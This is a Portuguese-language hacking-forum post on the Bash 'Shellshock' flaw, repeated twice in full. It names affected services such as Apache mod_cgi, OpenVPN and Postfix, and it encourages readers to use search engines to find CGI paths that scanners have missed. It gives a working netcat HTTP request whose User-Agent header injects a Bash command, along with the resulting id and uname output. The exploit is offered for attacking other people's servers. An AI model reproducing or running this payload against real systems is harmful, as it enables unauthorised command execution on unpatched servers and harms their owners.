Nao encontrei nenhum material aqui no forum falando sobre o bug, mas este bug ja tem alguns meses e ainda existem milhares de servidores, modens, etc etc.
Basta ter a versao do Bash desatualizada para explorar.
Existem varios servicos que usam o BASH para processar e retornar resultados e ae que o bug é explorado.
Os servicos em si nao estao vulneraveis mas eles sao a porta de entrada.
apache mod_cgi
openVPN
PostFix
Plataformas diversas (frameworks, modens, etc)
Muitos hacks estao varrendo toda classe de IP na internet e enviando o exploit a procura do BUG, masss existem milhares de sites que para chamar o mod_cgi do apache tem que executar um link exato:
ex: os caras estao scaneando GET / HTTP/1.1 mas os GET /linkx/linky HTTP/1.1 ainda estao totalmente livre dos scans e plataformas que tb exigem links diretos, ou seja, existem milhares de sites que os hacks ainda nao chegaram, agora a questao como chegar neles? heheheh GOOGLE ou outro motor ae é com vcssss
Tudo que use o Bash para executar alguma coisa é um vetor de entrada.
Explorar, voce pode usar o nc.exe (netcat.exe)
nc 127.0.0.1 80
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: pt-BR
User-Agent: () { foo;};echo; /bin/bash -c "id;uname -a"
Connection: keep-alive
Host: 127.0.0.1
ENTER
uid=1003(local) gid=1003(local) groups=1003(local)
Linux local 2.6.26-2-amd64 #1 SMP Thu Sep 16 15:56:38 UTC 2010 x86_64 GNU/Linux
é simples assim
algumas referencias
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Basta ter a versao do Bash desatualizada para explorar.
Existem varios servicos que usam o BASH para processar e retornar resultados e ae que o bug é explorado.
Os servicos em si nao estao vulneraveis mas eles sao a porta de entrada.
apache mod_cgi
openVPN
PostFix
Plataformas diversas (frameworks, modens, etc)
Muitos hacks estao varrendo toda classe de IP na internet e enviando o exploit a procura do BUG, masss existem milhares de sites que para chamar o mod_cgi do apache tem que executar um link exato:
ex: os caras estao scaneando GET / HTTP/1.1 mas os GET /linkx/linky HTTP/1.1 ainda estao totalmente livre dos scans e plataformas que tb exigem links diretos, ou seja, existem milhares de sites que os hacks ainda nao chegaram, agora a questao como chegar neles? heheheh GOOGLE ou outro motor ae é com vcssss
Tudo que use o Bash para executar alguma coisa é um vetor de entrada.
Explorar, voce pode usar o nc.exe (netcat.exe)
nc 127.0.0.1 80
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: pt-BR
User-Agent: () { foo;};echo; /bin/bash -c "id;uname -a"
Connection: keep-alive
Host: 127.0.0.1
ENTER
uid=1003(local) gid=1003(local) groups=1003(local)
Linux local 2.6.26-2-amd64 #1 SMP Thu Sep 16 15:56:38 UTC 2010 x86_64 GNU/Linux
é simples assim
algumas referencias
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...